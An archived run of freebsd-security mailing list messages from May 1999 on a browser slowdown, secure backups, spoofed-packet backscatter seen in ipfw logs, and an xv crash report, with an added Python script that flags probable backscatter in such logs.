Subject: Re: HTML DOS? (http://microsoft.com/NTServer/all/Downloads.asp)

Hi!

My experience upon looking at the page in question:

- With my FreeBSD box, running Netscape 4.6 (freebsd), it took about
  half a minute to display the page; the communicator process actually
  used almost all available RAM and a lot of CPU time. However, after
  exiting Communicator, I got back the RAM (it says now: 26M Free); the
  amount that has already been swapped out remains in place.

- After this I checked the same page from the same subnet with a W95
  machine running Netscape 4.51 and M$ Internet Explorer 5. (That
  machine has only 32M RAM, though, whereas mine has 64M.)

The results with Netscape: It took the browser an incredible almost two
minutes to display the page. (!) It first displayed the toolbar only,
and the two minutes are from when it appeared till the whole page was
visible. There was a lot of HDD activity going on at some times. I
could see the words Version-4.51[en]-xxxx on the title bar (xxxx stands
for some numbers; I do not remember them) during the rendering process.

With IE, the page came up swiftly (10-15 sec) but this actually is a
different page IMHO in what techniques it uses. E.g. I'd bet on it that
it uses no normal JavaScript but M$'s implementation JScript for IE.

I even tried with StarOffice and the page displayed very quickly. It
received the Netscape version. (No 3D buttons.)

From this I draw the conclusion that:

1) This problem is not UNIX specific, rather Netscape related.
2) FreeBSD actually did quite well, as you could see (30 sec rendering
   time as opposed to 2 min on W95).
3) I tried others of their pages and the error did not recur.
So I dare say there is some buggy code on that page and while it is
trying to execute, the browser is stuck. (Even the animation stops in
the corner.) It has something to do with browser-type parsing because
it was probably processing the data I saw on top (which was the
Netscape version and language followed by some interesting numbers).
It is possible that this has again something to do with their
client-tracking system.

4) It was clear from the very beginning that they design their pages in
   a way to look much better on IE (so that they can say, well, see the
   difference for yourself) but I cannot understand what they use
   JavaScript for. On the IE version it adds the functionality that the
   buttons become 3D and blue when you move your mouse over them. I am
   not an expert on JavaScript but if they try to implement something
   similar here then it simply doesn't work (and for that matter, never
   has, on any of their pages).

5) I do not think it is a DOS. I think that it is both M$'s and
   Netscape's fault. At M$ they simply ignore the standards when it
   comes to good-looking but product-conscious (Win only) pages and use
   asp, which is their own standard for including code into the page
   that executes while loading. That's why it's pretty sure that if you
   see asp pages somewhere then the server is almost certainly NT...

As for Netscape, memory handling problems always occurred, didn't they?
Besides, I could see that Netscape was stuck in RUN status so it was
trying very hard to run something. This status is _very_ CPU consuming
but memory is not always affected. I saw something similar for
RealPlayer: when it loses the connection to the streaming server, it
gets stuck in this mode until stopped or until it regains the
connection. It brings CPU usage up to 100% but it doesn't touch the
RAM. On WinNT, it actually took over all of the available RAM and swap
when left at that and in the end it froze. On Win95 it even crashed the
machine occasionally. So buggy software has always existed...
BTW, the worst I can think of on M$'s part is that they wanted to make
the page a bit slower to load to show off that IE is much better...

P.S.: I checked, Communicator 4.6 is still a.out.

Regards:
Szilveszter
Szeged University
Hungary

From owner-freebsd-security Mon May 17 13:23:32 1999
Received: from lanck.ru (hold.lanck.ru [195.19.223.4]) by hub.freebsd.org (Postfix) with ESMTP id 3B2B4152F4 for ; Mon, 17 May 1999 13:23:25 -0700 (PDT) (envelope-from uwl@lanck.ru)
Received: (from uucp@localhost) by lanck.ru (8.8.8/8.8.5) with UUCP id AAA07842 for freebsd-security@FreeBSD.ORG; Tue, 18 May 1999 00:29:10 +0400 (MSD)
Received: (from uwl@localhost) by koala.lanck.ru (8.8.8/8.8.8) id AAA24108; Tue, 18 May 1999 00:04:52 +0400 (MSD) (envelope-from uwl)
Message-ID: <19990518000449.A23521@lanck.ru>
Date: Tue, 18 May 1999 00:04:49 +0400
From: Vladimir Uralsky
To: freebsd-security@FreeBSD.ORG
Subject: Re: secure backup
References: <199905170014.MAA18766@smtp1.ihug.co.nz>
X-Mailer: Mutt 0.91.1i
In-Reply-To: <199905170014.MAA18766@smtp1.ihug.co.nz>; from nr1@ihug.co.nz on Mon, May 17, 1999 at 12:14:19PM +1200
X-Operating-System: FreeBSD 2.2.8-RELEASE i386

On Mon, May 17, 1999 at 12:14:19PM +1200, nr1@ihug.co.nz wrote:
> Can anyone recommend how I should go about creating a backup to an untrusted
> machine that has the tape drive, and using an untrusted network.

see cfs in /usr/ports/security/cfs.

-- 
Vova.

From owner-freebsd-security Mon May 17 14: 2:10 1999
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id C4C8F156CC for ; Mon, 17 May 1999 14:02:06 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca)
Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id OAA29710 for ; Mon, 17 May 1999 14:03:52 -0700
Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda29704; Mon May 17 14:03:44 1999
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id OAA29759 for ; Mon, 17 May 1999 14:01:57 -0700 (PDT)
Message-Id: <199905172101.OAA29759@passer.osg.gov.bc.ca>
Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdu29752; Mon May 17 14:01:54 1999
X-Mailer: exmh version 2.0.2 2/24/98
Reply-To: Cy Schubert - ITSD Open Systems Group
X-OS: FreeBSD 3.1-RELEASE
X-Sender: cschuber
To: freebsd-security@freebsd.org
Subject: Interesting Attack
Date: Mon, 17 May 1999 14:01:54 -0700
From: Cy Schubert

I'm seeing a number of packets from sites around the Internet to port
1096. What service lives on port 1096? Has anyone seen this before? I
did change my firewall rules in response to the ACK+RST probes
discussed on BUGTRAQ and here to catch this kind of activity.

May 12 22:40:58 friendly.system /kernel: ipfw: 65534 Deny TCP 24.93.100.204:0 1.2.3.4:1096 in via xl0
May 13 02:26:03 friendly.system /kernel: ipfw: 65534 Deny TCP 207.76.224.149:113 1.2.3.4:1096 in via xl0
May 13 19:56:51 friendly.system /kernel: ipfw: 65534 Deny TCP 207.154.210.5:6667 1.2.3.4:1096 in via xl0
May 13 19:56:51 friendly.system /kernel: ipfw: 65534 Deny TCP 207.154.210.5:6667 1.2.3.4:1096 in via xl0
May 14 20:15:13 friendly.system /kernel: ipfw: 65534 Deny TCP 129.11.116.121:2 1.2.3.4:1096 in via xl0
May 15 00:20:08 friendly.system /kernel: ipfw: 65534 Deny TCP 207.240.152.35:0 1.2.3.4:1096 in via xl0
May 15 00:20:33 friendly.system /kernel: ipfw: 65534 Deny TCP 207.240.152.35:0 1.2.3.4:1096 in via xl0
May 15 00:56:01 friendly.system /kernel: ipfw: 65534 Deny TCP 24.94.50.65:139 1.2.3.4:1096 in via xl0
May 15 00:56:03 friendly.system /kernel: ipfw: 65534 Deny TCP 24.94.50.65:139 1.2.3.4:1096 in via xl0
May 15 02:33:56 friendly.system /kernel: ipfw: 65534 Deny TCP 159.138.5.1:46643 1.2.3.4:1096 in via xl0
May 15 12:25:51 friendly.system /kernel: ipfw: 65534 Deny TCP 200.33.78.3:23 1.2.3.4:1096 in via xl0
May 15 12:54:38 friendly.system /kernel: ipfw: 65534 Deny TCP 200.33.78.3:23 1.2.3.4:1096 in via xl0
May 15 16:06:06 friendly.system /kernel: ipfw: 65534 Deny TCP 167.205.22.114:23 1.2.3.4:1096 in via xl0
May 15 16:06:06 friendly.system /kernel: ipfw: 65534 Deny TCP 167.205.22.114:23 1.2.3.4:1096 in via xl0
May 15 21:24:49 friendly.system /kernel: ipfw: 65534 Deny TCP 192.148.248.24:2 1.2.3.4:1096 in via xl0
May 15 21:33:22 friendly.system /kernel: ipfw: 65534 Deny TCP 192.148.248.24:23 1.2.3.4:1096 in via xl0
May 15 21:33:23 friendly.system /kernel: ipfw: 65534 Deny TCP 192.148.248.24:23 1.2.3.4:1096 in via xl0
May 15 22:47:50 friendly.system /kernel: ipfw: 65534 Deny TCP 207.229.143.42:22 1.2.3.4:1096 in via xl0
May 15 22:47:50 friendly.system /kernel: ipfw: 65534 Deny TCP 207.229.143.42:22 1.2.3.4:1096 in via xl0
May 16 00:18:08 friendly.system /kernel: ipfw: 65534 Deny TCP 209.54.43.135:23 1.2.3.4:1096 in via xl0
May 16 00:18:08 friendly.system /kernel: ipfw: 65534 Deny TCP 209.54.43.135:23 1.2.3.4:1096 in via xl0
May 16 00:34:48 friendly.system /kernel: ipfw: 65534 Deny TCP 208.201.224.36:113 1.2.3.4:1096 in via xl0
May 16 00:34:49 friendly.system /kernel: ipfw: 65534 Deny TCP 208.201.224.36:113 1.2.3.4:1096 in via xl0
May 16 11:39:32 friendly.system /kernel: ipfw: 65534 Deny TCP 203.37.45.2:6667 1.2.3.4:1096 in via xl0
May 16 13:04:42 friendly.system /kernel: ipfw: 65534 Deny TCP 203.37.45.2:6667 1.2.3.4:1096 in via xl0
May 16 14:46:57 friendly.system /kernel: ipfw: 65534 Deny TCP 209.224.60.180:23 1.2.3.4:1096 in via xl0
May 16 14:47:36 friendly.system /kernel: ipfw: 65534 Deny TCP 209.224.60.180:23 1.2.3.4:1096 in via xl0
May 16 17:51:34 friendly.system /kernel: ipfw: 65534 Deny TCP 207.96.57.242:113 1.2.3.4:1096 in via xl0
May 16 18:26:58 friendly.system /kernel: ipfw: 65534 Deny TCP 24.1.187.156:0 1.2.3.4:1096 in via xl0
May 16 18:27:49 friendly.system /kernel: ipfw: 65534 Deny TCP 24.1.187.156:0 1.2.3.4:1096 in via xl0
May 16 23:41:46 friendly.system /kernel: ipfw: 65534 Deny TCP 208.133.73.83:6667 1.2.3.4:1096 in via xl0
May 16 23:41:46 friendly.system /kernel: ipfw: 65534 Deny TCP 208.133.73.83:6667 1.2.3.4:1096 in via xl0
May 17 13:05:19 friendly.system /kernel: ipfw: 65534 Deny TCP 24.64.167.106:139 1.2.3.4:1096 in via xl0

Regards,                       Phone:  (250)387-8437
Cy Schubert                    Fax:    (250)387-5766
Open Systems Group             Internet:  Cy.Schubert@uumail.gov.bc.ca
ITSD                                      Cy.Schubert@gems8.gov.bc.ca
Province of BC
"e**(i*pi)+1=0"

From owner-freebsd-security Mon May 17 14:10:45 1999
Received: from mail.go2france.com (go2france.com [209.51.193.70]) by hub.freebsd.org (Postfix) with SMTP id 22CEC15677 for ; Mon, 17 May 1999 14:10:42 -0700 (PDT) (envelope-from lconrad@Go2France.com)
Received: from dell01 [195.68.3.43] by mail.go2france.com (SMTPD32-4.03) id A1FA5A100F2; Mon, 17 May 1999 15:46:02 EST5EDT
Message-Id: <4.1.19990517230816.027ceee0@mail.go2france.com>
X-Sender: lconrad@mail.go2france.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Mon, 17 May 1999 23:08:28 +0200
To: freebsd-security@FreeBSD.ORG
From: Len Conrad
Subject: subscribe freebsd-net

subscribe freebsd-security

From owner-freebsd-security Mon May 17 14:45:31 1999
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 9E25614E10 for ; Mon, 17 May 1999 14:45:27 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id XAA60012; Mon, 17 May 1999 23:45:19 +0200 (CEST) (envelope-from des)
To: Cy Schubert - ITSD Open Systems Group
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Interesting Attack
References: <199905172101.OAA29759@passer.osg.gov.bc.ca>
From: Dag-Erling Smorgrav
Date: 17 May 1999 23:45:18 +0200
In-Reply-To: Cy Schubert's message of "Mon, 17 May 1999 14:01:54 -0700"
Lines: 24
X-Mailer: Gnus v5.5/Emacs 19.34

Cy Schubert writes:
> I'm seeing a number of packets from sites around the Internet to
> port 1096. What service lives on port 1096? Has anyone seen this
> before?

None. I think somebody's trying to bounce packets off your machine to
another box by spoofing the source address, *or* somebody has been
sending spoofed packets with your IP as source address to some other
boxen.

Look at the source ports: 23 (telnet), 139 (NetBIOS), 6667 (IRC)... I
checked the IP addresses which appear with port 6667, and they're all
IRC servers. You wouldn't expect connections to *originate* from port
6667 on these boxen; I think somebody sent them SYN packets made up to
look as if they came from you, and they replied.

In any case, I don't think you're the target; you're just an innocent
passer-by which they picked to pin the blame on (from the POV of the
target sites, it looks as if *you* ran a port scan on them - or would
if your firewall hadn't dropped those packets).
DES
-- 
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Mon May 17 16:48:34 1999
Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id B01B61540E for ; Mon, 17 May 1999 16:48:30 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au)
Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id JAA29928; Tue, 18 May 1999 09:18:29 +0930 (CST)
Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA28585; Tue, 18 May 1999 09:19:19 +0930
Date: Tue, 18 May 1999 09:19:18 +0930 (CST)
From: Kris Kennaway
X-Sender: kkennawa@bragg
To: Dag-Erling Smorgrav
Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG
Subject: Re: Interesting Attack

On 17 May 1999, Dag-Erling Smorgrav wrote:

> Cy Schubert writes:
> > I'm seeing a number of packets from sites around the Internet to
> > port 1096. What service lives on port 1096? Has anyone seen this
> > before?
> 
> None. I think somebody's trying to bounce packets off your machine to
> another box by spoofing the source address, *or* somebody has been
> sending spoofed packets with your IP as source address to some other
> boxen.
> 
> Look at the source ports: 23 (telnet), 139 (NetBIOS), 6667 (IRC)... I
> checked the IP addresses which appear with port 6667, and they're all
> IRC servers. You wouldn't expect connections to *originate* from port
> 6667 on these boxen; I think somebody sent them SYN packets made up to
> look as if they came from you, and they replied.
> 
> In any case, I don't think you're the target; you're just an innocent
> passer-by which they picked to pin the blame on (from the POV of the
> target sites, it looks as if *you* ran a port scan on them - or would
> if your firewall hadn't dropped those packets).

I was getting hundreds of similar packets per day here a few weeks ago,
almost all from different sites, all from spoofed source addresses, to
a nonexistent IP address and on an unobtrusive port number (1584) but
the common thread was that all of the source hosts were running an IRC
daemon. I never did find out conclusively what it was, but my guess is
that someone was using my source address to spoof packets from, and I
was seeing reverse probes by the IRC server. It all stopped when I
turned on IP unreachables on my firewall..
Kris

-----
"That suit's sharper than a page of Oscar Wilde witticisms that's been
rolled up into a point, sprinkled with lemon juice and jabbed into
someone's eye"
"Wow, that's sharp!"
- Ace Rimmer and the Cat, _Red Dwarf_

From owner-freebsd-security Mon May 17 16:49: 2 1999
Received: from fallout.campusview.indiana.edu (fallout.campusview.indiana.edu [149.159.1.1]) by hub.freebsd.org (Postfix) with ESMTP id AD83D1540E for ; Mon, 17 May 1999 16:48:57 -0700 (PDT) (envelope-from jfieber@fallout.campusview.indiana.edu)
Received: from localhost (jfieber@localhost) by fallout.campusview.indiana.edu (8.9.3/8.9.1) with ESMTP id SAA66234; Mon, 17 May 1999 18:48:47 -0500 (EST)
Date: Mon, 17 May 1999 18:48:46 -0500 (EST)
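The reasoning in Dag-Erling's and Kris's replies above, as an added Python example that is not part of the thread or of ipfw(8): it parses ipfw Deny log lines of the form Cy posted and flags inbound packets that arrive *from* a service port (telnet, ident, NetBIOS, IRC) to an unused high port, from many unrelated hosts, which is what replies to SYNs carrying this host's address as a forged source look like. The service-port set, the locally-listening port set and the threshold are assumptions for the example; the last sample log line is constructed for contrast.

```python
"""Classify firewall log lines as probable backscatter from spoofed SYNs.

Added example, not from the thread or from ipfw: applies the source-port
argument from the replies (a real server answers *from* its service port;
getting such answers on a high port nobody here connected from means
somebody else started that handshake using our address) to ipfw Deny lines.
"""
import re
from collections import Counter

IPFW_RE = re.compile(
    r"ipfw: (?P<rule>\d+) (?P<action>\w+) (?P<proto>TCP|UDP) "
    r"(?P<src>\d+\.\d+\.\d+\.\d+):(?P<sport>\d+) "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+) (?P<dir>in|out) via (?P<iface>\S+)"
)

# Ports a server answers from (assumed set for the example). Port 0 is
# included because some of the posted lines carry it as source port.
SERVICE_PORTS = {0, 21, 22, 23, 25, 53, 80, 110, 113, 139, 443, 6667}

# Ports this host really listens on (assumption); replies to connections
# we did make land on ephemeral ports, so only *unused* high ports count.
LOCAL_LISTENING = {22, 25}

# Sample input: six lines from Cy's post, plus one constructed ordinary
# connection (192.0.2.10 is a documentation address) that must not match.
SAMPLE_LOG = """\
May 12 22:40:58 friendly.system /kernel: ipfw: 65534 Deny TCP 24.93.100.204:0 1.2.3.4:1096 in via xl0
May 13 02:26:03 friendly.system /kernel: ipfw: 65534 Deny TCP 207.76.224.149:113 1.2.3.4:1096 in via xl0
May 13 19:56:51 friendly.system /kernel: ipfw: 65534 Deny TCP 207.154.210.5:6667 1.2.3.4:1096 in via xl0
May 15 00:56:01 friendly.system /kernel: ipfw: 65534 Deny TCP 24.94.50.65:139 1.2.3.4:1096 in via xl0
May 15 02:33:56 friendly.system /kernel: ipfw: 65534 Deny TCP 159.138.5.1:46643 1.2.3.4:1096 in via xl0
May 15 12:25:51 friendly.system /kernel: ipfw: 65534 Deny TCP 200.33.78.3:23 1.2.3.4:1096 in via xl0
May 16 09:00:00 friendly.system /kernel: ipfw: 100 Accept TCP 192.0.2.10:40123 1.2.3.4:22 in via xl0
""".splitlines()


def parse_ipfw(line):
    """Return a dict for an ipfw log line, or None if it is not one."""
    m = IPFW_RE.search(line)
    if not m:
        return None
    pkt = m.groupdict()
    for key in ("rule", "sport", "dport"):
        pkt[key] = int(pkt[key])
    return pkt


def is_backscatter_candidate(pkt):
    """Inbound TCP from a service port to an unused high port on our side."""
    return (
        pkt["dir"] == "in"
        and pkt["proto"] == "TCP"
        and pkt["sport"] in SERVICE_PORTS
        and pkt["dport"] > 1023
        and pkt["dport"] not in LOCAL_LISTENING
    )


def analyze(lines):
    """Parse lines and summarise the candidates by source host and port."""
    pkts = [p for p in (parse_ipfw(ln) for ln in lines) if p]
    suspects = [p for p in pkts if is_backscatter_candidate(p)]
    return {
        "parsed": len(pkts),
        "suspects": suspects,
        "distinct_sources": len({p["src"] for p in suspects}),
        "by_source_port": Counter(p["sport"] for p in suspects),
        "target_ports": {p["dport"] for p in suspects},
    }


def verdict(report, min_sources=3):
    """Many unrelated hosts replying from service ports to the same high
    port is the signature of our address being used as a forged source."""
    if report["distinct_sources"] >= min_sources and len(report["target_ports"]) == 1:
        return "likely backscatter: our address is being used as a spoofed source"
    return "no clear backscatter pattern"


if __name__ == "__main__":
    rep = analyze(SAMPLE_LOG)
    print(rep["distinct_sources"], "sources, by source port:", dict(rep["by_source_port"]))
    print(verdict(rep))
```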
From: John Fieber
To: Wes Peters
Cc: nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG
Subject: Re: secure backup
In-Reply-To: <374024BF.3EAD1892@softweyr.com>

On Mon, 17 May 1999, Wes Peters wrote:

> > Can anyone recommend how I should go about creating a backup to an untrusted
> > machine that has the tape drive, and using an untrusted network.
> 
> Can Amanda help with something like this? Perhaps if you fed it an
> encryption program instead of a compression program? Does Amanda
> have the ability to encrypt files as they are backed up?

It supposedly has support for Kerberos IV for both authentication and
encrypted transfer. I can't say I've tried to make it work though as
I'm in a Kerberos V environment.

-john

From owner-freebsd-security Mon May 17 19:34:52 1999
Received: from etosha (modem02.tdnet.com.br [200.236.148.195]) by hub.freebsd.org (Postfix) with SMTP id C5E2914E96 for ; Mon, 17 May 1999 19:34:40 -0700 (PDT) (envelope-from kernel@tdnet.com.br)
Received: (qmail 7351 invoked from network); 18 May 1999 02:34:25 -0000
Received: from localhost (HELO tdnet.com.br) (127.0.0.1) by localhost with SMTP; 18 May 1999 02:34:25 -0000
Message-ID: <3740B863.6C20B59E@tdnet.com.br>
Date: Mon, 17 May 1999 21:46:28 -0300
From: Unknow User
X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386)
To: freebsd-security@freebsd.org
Subject: user uses xv3.10a (PNG) to halt my system.

Dear gentlemen,

Probably this is not the most suitable mailing list to post this
message to, but it's not worth subscribing to fbsd-questions only to
get an answer. (If you hate me for that, ignore me.)

a) My system is 2.2.8-STABLE; where can I get an updated list of
   patches for this system?
b) I have installed xv 3.10a (PNG), but my system has frozen from
   running this software! So now a user (I don't know which) has been
   stopping my system.
c) Is it possible to know which user is doing that?
d) How can a user application halt my system? Isn't fbsd supposed to be
   robust enough to handle this?

Thank you for your time and cooperation!

Best regards,
Gustavo Rios

From owner-freebsd-security Mon May 17 19:42:52 1999
Received: from implode.root.com (root.com [209.102.106.178]) by hub.freebsd.org (Postfix) with ESMTP id C5009153F2 for ; Mon, 17 May 1999 19:42:50 -0700 (PDT) (envelope-from root@implode.root.com)
Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.8/8.8.5) with ESMTP id TAA19780; Mon, 17 May 1999 19:41:56 -0700 (PDT)
Message-Id: <199905180241.TAA19780@implode.root.com>
To: Unknow User
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: user uses xv3.10a (PNG) to halt my system.
In-reply-to: Your message of "Mon, 17 May 1999 21:46:28 -0300." <3740B863.6C20B59E@tdnet.com.br>
From: David Greenman
Reply-To: dg@root.com
Date: Mon, 17 May 1999 19:41:56 -0700

>Dear gentlemen,
>
>Probably this is not the most suitable mailing list to post this
>message to, but it's not worth subscribing to fbsd-questions only to
>get an answer. (If you hate me for that, ignore me.)
>
>a) My system is 2.2.8-STABLE; where can I get an updated list of
>   patches for this system?
>b) I have installed xv 3.10a (PNG), but my system has frozen from
>   running this software! So now a user (I don't know which) has been
>   stopping my system.
>c) Is it possible to know which user is doing that?
>d) How can a user application halt my system? Isn't fbsd supposed to be
>   robust enough to handle this?

   If you don't know which user is doing it, then how do you know that it
is xv that is causing the problem? I use that version of xv on various
systems here, with different versions of FreeBSD (including 2.2.8), all
the time and have never had problems.

-DG

David Greenman
Co-founder/Principal Architect, The FreeBSD Project - http://www.freebsd.org
Creator of high-performance Internet servers - http://www.terasolutions.com

From owner-freebsd-security Mon May 17 19:47:45 1999
Received: from etosha (modem02.tdnet.com.br [200.236.148.195]) by hub.freebsd.org (Postfix) with SMTP id A61D314E96 for ; Mon, 17 May 1999 19:47:31 -0700 (PDT) (envelope-from kernel@tdnet.com.br)
Received: (qmail 302 invoked from network); 18 May 1999 02:47:21 -0000
Received: from localhost (HELO tdnet.com.br) (127.0.0.1) by localhost with SMTP; 18 May 1999 02:47:21 -0000
Message-ID: <3740D4B8.7B2AE924@tdnet.com.br>
Date: Mon, 17 May 1999 23:47:20 -0300
From: Unknow User
X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386)
To: dg@root.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: user uses xv3.10a (PNG) to halt my system.
References: <199905180241.TAA19780@implode.root.com>

Simple: I did work with fbsd, and the system froze! I sent a mail to
all users, and one sent me a mail saying he had the same problem and he
did not wish to freeze the system! As no core file is dumped, is there
any way to send the xv authors something to track the problem?

-- 
"The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD."

From owner-freebsd-security Mon May 17 19:48: 5 1999
Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id B0D5A15655 for ; Mon, 17 May 1999 19:47:58 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au)
Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id MAA31701; Tue, 18 May 1999 12:17:56 +0930 (CST)
Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA32583; Tue, 18 May 1999 12:18:46 +0930
Date: Tue, 18 May 1999 12:18:45 +0930 (CST)
From: Kris Kennaway
X-Sender: kkennawa@bragg
To: Unknow User
Cc: freebsd-security@freebsd.org
Subject: Re: user uses xv3.10a (PNG) to halt my system.
In-Reply-To: <3740B863.6C20B59E@tdnet.com.br>

On Mon, 17 May 1999, Unknow User wrote:

> a) My system is 2.2.8-STABLE; where can I get an updated list of
>    patches for this system?

Try cvsup. It's documented in the handbook.

> b) I have installed xv 3.10a (PNG), but my system has frozen from
>    running this software! So now a user (I don't know which) has been
>    stopping my system.

How do you know it is xv? It's more likely you're running into a
problem with the system, not triggered by xv at all. You're correct
that a user application shouldn't be able to do this, and given the
lack of any other reports about this problem I doubt it is in your
case either.

Kris

-----
"That suit's sharper than a page of Oscar Wilde witticisms that's been
rolled up into a point, sprinkled with lemon juice and jabbed into
someone's eye"
"Wow, that's sharp!"
- Ace Rimmer and the Cat, _Red Dwarf_

From owner-freebsd-security Mon May 17 19:51:38 1999
Received: from etosha (modem02.tdnet.com.br [200.236.148.195]) by hub.freebsd.org (Postfix) with SMTP id 8321714D86 for ; Mon, 17 May 1999 19:51:25 -0700 (PDT) (envelope-from kernel@tdnet.com.br)
Received: (qmail 4216 invoked from network); 18 May 1999 02:51:14 -0000
Received: from localhost (HELO tdnet.com.br) (127.0.0.1) by localhost with SMTP; 18 May 1999 02:51:14 -0000
Message-ID: <3740D5A2.9E5D0816@tdnet.com.br>
Date: Mon, 17 May 1999 23:51:14 -0300
From: Unknow User
X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386)
To: Kris Kennaway
Cc: freebsd-security@freebsd.org
Subject: Re: user uses xv3.10a (PNG) to halt my system.

Kris Kennaway wrote:
> 
> How do you know it is xv? It's more likely you're running into a problem with
> the system, not triggered by xv at all. You're correct that a user application
> shouldn't be able to do this, and given the lack of any other reports about
> this problem I doubt it is in your case either.
> 
> Kris

No, the user sent me mails about the problem (he did not want to hang
the system), and I worked with xv, and the system really hung.

-- 
"The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD."

From owner-freebsd-security Mon May 17 19:52:37 1999
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (Postfix) with ESMTP id BB83D14A09 for ; Mon, 17 May 1999 19:52:29 -0700 (PDT) (envelope-from avalon@cheops.anu.edu.au)
Received: (from avalon@localhost) by cheops.anu.edu.au (8.9.1/8.9.1) id MAA14768; Tue, 18 May 1999 12:52:14 +1000 (EST)
From: Darren Reed
Message-Id: <199905180252.MAA14768@cheops.anu.edu.au>
Subject: Re: user uses xv3.10a (PNG) to halt my system.
To: kernel@tdnet.com.br (Unknow User)
Date: Tue, 18 May 1999 12:52:14 +1000 (EST)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <3740B863.6C20B59E@tdnet.com.br> from "Unknow User" at May 17, 99 09:46:28 pm
X-Mailer: ELM [version 2.4 PL23]

In some mail from Unknow User, sie said:
> 
> Dear gentlemen,
> 
> Probably this is not the most suitable mailing list to post this
> message to, but it's not worth subscribing to fbsd-questions only to
> get an answer. (If you hate me for that, ignore me.)
> 
> a) My system is 2.2.8-STABLE; where can I get an updated list of
>    patches for this system?
> b) I have installed xv 3.10a (PNG), but my system has frozen from
>    running this software! So now a user (I don't know which) has been
>    stopping my system.
> c) Is it possible to know which user is doing that?
> d) How can a user application halt my system? Isn't fbsd supposed to be
>    robust enough to handle this?

xv is a big user of both RAM and CPU. You might want to do something
like run "vmstat 1" and then start up xv to see what happens.
Darren

From owner-freebsd-security Mon May 17 19:53:37 1999
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.inreach.com (unknown [209.142.0.6]) by hub.freebsd.org (Postfix) with ESMTP id 4412414BD6 for ; Mon, 17 May 1999 19:53:34 -0700 (PDT) (envelope-from condor@inreach.com)
Received: from pavilion (209-142-4-217.stk.inreach.net [209.142.4.217]) by smtp.inreach.com (8.9.3/8.9.3) with SMTP id TAA21992; Mon, 17 May 1999 19:41:00 -0700 (PDT)
Received: by localhost with Microsoft MAPI; Mon, 17 May 1999 19:52:54 -0700
Message-ID: <01BEA09E.DA43B5A0.condor@inreach.com>
From: CONDOR
Reply-To: "condor@inreach.com"
To: "'John Fieber'" , Wes Peters
Cc: "nr1@ihug.co.nz" , "freebsd-security@FreeBSD.ORG"
Subject: RE: secure backup
Date: Mon, 17 May 1999 19:44:30 -0700
Organization: Condor Worldwide Data Systems
X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----Original Message-----
From: John Fieber [SMTP:jfieber@indiana.edu]
Sent: Monday, May 17, 1999 16:49
To: Wes Peters
Cc: nr1@ihug.co.nz; freebsd-security@FreeBSD.ORG
Subject: Re: secure backup

On Mon, 17 May 1999, Wes Peters wrote:
> > Can anyone recommend how I should go about creating a backup to an untrusted
> > machine that has the tape drive, and using an untrusted network.

[CONDOR] Buy a tape drive.. they are cheaper now than before. ;-)

From owner-freebsd-security Mon May 17 20:06:41 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 9582914A09 for ; Mon, 17 May 1999 20:06:38 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id VAA58064; Mon, 17 May 1999 21:05:32 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA75124; Mon, 17 May 1999 21:07:05 -0600 (MDT)
Message-Id: <199905180307.VAA75124@harmony.village.org>
To: Harold Gutch
Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD
